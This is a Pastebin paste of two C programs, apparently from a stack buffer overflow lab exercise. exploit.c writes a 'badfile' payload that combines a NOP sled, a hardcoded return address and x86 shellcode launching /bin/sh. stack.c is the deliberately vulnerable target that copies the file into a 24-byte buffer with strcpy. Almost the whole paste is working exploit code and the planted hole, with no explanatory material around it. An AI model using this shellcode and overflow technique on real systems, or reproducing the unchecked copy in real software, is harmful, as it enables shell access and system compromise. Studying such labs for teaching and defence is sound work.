Advertisement
Guest User

Untitled

a guest
Nov 14th, 2018
125
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.13 KB | None | 0 0
  1. /* exploit.c */
  2.  
  3. /* A program that creates a file containing code for launching shell*/
  4. #include <stdlib.h>
  5. #include <stdio.h>
  6. #include <string.h>
  7. char shellcode[]=
  8. "\x31\xc0" /* xorl %eax,%eax */
  9. "\x50" /* pushl %eax */
  10. "\x68""//sh" /* pushl $0x68732f2f */
  11. "\x68""/bin" /* pushl $0x6e69622f */
  12. "\x89\xe3" /* movl %esp,%ebx */
  13. "\x50" /* pushl %eax */
  14. "\x53" /* pushl %ebx */
  15. "\x89\xe1" /* movl %esp,%ecx */
  16. "\x99" /* cdq */
  17. "\xb0\x0b" /* movb $0x0b,%al */
  18. "\xcd\x80" /* int $0x80 */
  19. ;
  20.  
  21. void main(int argc, char **argv)
  22. {
  23. char buffer[517];
  24. FILE *badfile;
  25.  
  26. /* Initialize buffer with 0x90 (NOP instruction) */
  27. memset(&buffer, 0x90, 517);
  28.  
  29. /* You need to fill the buffer with appropriate contents here */
  30. /*this line of code places the return address of execution into memory*/
  31. *((long *) (buffer + 0x24)) = 0xbffff260;
  32. /*This line places the shellcode towards the end of the buffer*/
  33. memcpy(buffer + sizeof(buffer) - sizeof(shellcode), shellcode,
  34. sizeof(shellcode));
  35. /* Save the contents to the file "badfile" */
  36. badfile = fopen("./badfile", "w");
  37. fwrite(buffer, 517, 1, badfile);
  38. fclose(badfile);
  39. }
  40.  
  41.  
  42. |||||||||||||||||
  43.  
  44. /* stack.c */
  45.  
  46. /* This program has a buffer overflow vulnerability. */
  47. /* Our task is to exploit this vulnerability */
  48. #include <stdlib.h>
  49. #include <stdio.h>
  50. #include <string.h>
  51.  
  52. int bof(char *str)
  53. {
  54. char buffer[24];
  55.  
  56. /* The following statement has a buffer overflow problem */
  57. strcpy(buffer, str);
  58.  
  59. return 1;
  60. }
  61.  
  62. int main(int argc, char **argv)
  63. {
  64. char str[517];
  65. FILE *badfile;
  66.  
  67. badfile = fopen("badfile", "r");
  68. fread(str, sizeof(char), 517, badfile);
  69. bof(str);
  70.  
  71. printf("Returned Properly\n");
  72. return 1;
  73. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement